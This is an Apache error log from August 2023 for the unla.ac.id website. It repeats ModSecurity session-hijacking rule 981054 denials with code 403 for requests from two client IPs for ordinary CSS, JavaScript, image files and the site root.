[Mon Aug 28 08:12:08.467012 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv0aMCo-f0AAJKjaAEAAAAG"]
[Mon Aug 28 08:12:08.467919 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv0aMCo-f0AAJSxY0QAAAAH"]
[Mon Aug 28 08:12:08.475398 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv0aMCo-f0AAJWfZI4AAAAI"]
[Mon Aug 28 08:12:08.554903 2023] [:error] [pid 38114] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv0aMCo-f0AAJTincMAAAAE"]
[Mon Aug 28 08:12:08.569655 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv0aMCo-f0AAJWfZI8AAAAI"]
[Mon Aug 28 08:12:08.621423 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv0aMCo-f0AAJKjaAIAAAAG"]
[Mon Aug 28 08:12:08.626682 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv0aMCo-f0AAJWeoTsAAAAF"]
[Mon Aug 28 08:12:08.634748 2023] [:error] [pid 38059] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv0aMCo-f0AAJSr2vYAAAAO"]
[Mon Aug 28 08:12:08.635700 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv0aMCo-f0AAJUz@nkAAAAM"]
[Mon Aug 28 08:12:08.713489 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv0aMCo-f0AAJSxY0UAAAAH"]
[Mon Aug 28 08:12:08.715657 2023] [:error] [pid 38302] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv0aMCo-f0AAJWeoTwAAAAF"]
[Mon Aug 28 08:12:08.778537 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv0aMCo-f0AAJUz@noAAAAM"]
[Mon Aug 28 08:12:08.879715 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv0aMCo-f0AAJKjaAMAAAAG"]
[Mon Aug 28 08:12:09.675549 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOv0acCo-f0AAJUz@nsAAAAM"]
[Mon Aug 28 08:12:09.676785 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOv0acCo-f0AAJSxY0YAAAAH"]
[Mon Aug 28 08:12:09.679779 2023] [:error] [pid 38233] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOv0acCo-f0AAJVZ9hUAAAAR"]
[Mon Aug 28 08:12:09.680660 2023] [:error] [pid 38114] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOv0acCo-f0AAJTincQAAAAE"]
[Mon Aug 28 08:12:09.687573 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOv0acCo-f0AAJKjaAQAAAAG"]
[Mon Aug 28 08:12:09.711924 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOv0acCo-f0AAJU0qcUAAAAD"]
[Mon Aug 28 08:12:09.849485 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOv0acCo-f0AAJWfZJAAAAAI"]
[Mon Aug 28 08:12:09.857783 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOv0acCo-f0AAJOr99QAAAAL"]
[Mon Aug 28 08:12:09.867377 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOv0acCo-f0AAJUz@nwAAAAM"]
[Mon Aug 28 08:12:09.867843 2023] [:error] [pid 38150] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOv0acCo-f0AAJUGIW0AAAAC"]
[Mon Aug 28 08:12:11.580025 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv0a8Co-f0AAJSxY0cAAAAH"]
[Mon Aug 28 08:13:33.554083 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv0vcCo-f0AAJXCvnsAAAAJ"]
[Mon Aug 28 08:13:33.560465 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv0vcCo-f0AAJSxY1YAAAAH"]
[Mon Aug 28 08:13:33.564222 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv0vcCo-f0AAJS7R7EAAAAB"]
[Mon Aug 28 08:13:33.589685 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv0vcCo-f0AAJWfZKIAAAAI"]
[Mon Aug 28 08:13:33.590684 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0vcCo-f0AAJSxY1cAAAAH"]
[Mon Aug 28 08:13:33.590850 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv0vcCo-f0AAJXCvnwAAAAJ"]
[Mon Aug 28 08:13:33.635248 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv0vcCo-f0AAJS7R7IAAAAB"]
[Mon Aug 28 08:13:33.642448 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv0vcCo-f0AAJWfZKMAAAAI"]
[Mon Aug 28 08:13:33.651056 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv0vcCo-f0AAJSxY1gAAAAH"]
[Mon Aug 28 08:13:33.670687 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0vcCo-f0AAJXCvn0AAAAJ"]
[Mon Aug 28 08:13:33.676628 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv0vcCo-f0AAJS7R7MAAAAB"]
[Mon Aug 28 08:13:33.691617 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv0vcCo-f0AAJWfZKQAAAAI"]
[Mon Aug 28 08:13:33.709602 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv0vcCo-f0AAJSxY1kAAAAH"]
[Mon Aug 28 08:13:33.716859 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv0vcCo-f0AAJXCvn4AAAAJ"]
[Mon Aug 28 08:13:33.724864 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv0vcCo-f0AAJS7R7QAAAAB"]
[Mon Aug 28 08:13:33.731668 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv0vcCo-f0AAJWfZKUAAAAI"]
[Mon Aug 28 08:13:33.736804 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv0vcCo-f0AAJSxY1oAAAAH"]
[Mon Aug 28 08:13:33.762838 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv0vcCo-f0AAJXCvn8AAAAJ"]
[Mon Aug 28 08:13:33.771822 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv0vcCo-f0AAJSxY1sAAAAH"]
[Mon Aug 28 08:13:33.778864 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv0vcCo-f0AAJWfZKYAAAAI"]
[Mon Aug 28 08:13:33.782895 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv0vcCo-f0AAJS7R7UAAAAB"]
[Mon Aug 28 08:13:33.790819 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv0vcCo-f0AAJXCvoAAAAAJ"]
[Mon Aug 28 08:13:33.810409 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv0vcCo-f0AAJSxY1wAAAAH"]
[Mon Aug 28 08:13:33.820008 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv0vcCo-f0AAJWfZKcAAAAI"]
[Mon Aug 28 08:13:33.827697 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv0vcCo-f0AAJS7R7YAAAAB"]
[Mon Aug 28 08:13:33.840109 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv0vcCo-f0AAJXCvoEAAAAJ"]
[Mon Aug 28 08:13:33.854507 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv0vcCo-f0AAJSxY10AAAAH"]
[Mon Aug 28 08:13:33.895861 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv0vcCo-f0AAJS7R7cAAAAB"]
[Mon Aug 28 08:13:41.368501 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0xcCo-f0AAJTindkAAAAE"]
[Mon Aug 28 08:13:41.417408 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv0xcCo-f0AAJSxY18AAAAH"]
[Mon Aug 28 08:13:43.716231 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0x8Co-f0AAJWfZKoAAAAI"]
[Mon Aug 28 08:13:44.399416 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0yMCo-f0AAJS7R7oAAAAB"]
[Mon Aug 28 08:13:44.717576 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0yMCo-f0AAJOr9@8AAAAL"]
[Mon Aug 28 08:13:44.919128 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0yMCo-f0AAJKjaBwAAAAG"]
[Mon Aug 28 08:13:45.084091 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJXDU2UAAAAK"]
[Mon Aug 28 08:13:45.250652 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJSr2w4AAAAO"]
[Mon Aug 28 08:13:45.415301 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJTindsAAAAE"]
[Mon Aug 28 08:13:45.588768 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJSr2w8AAAAO"]
[Mon Aug 28 08:13:45.743693 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJS7R7sAAAAB"]
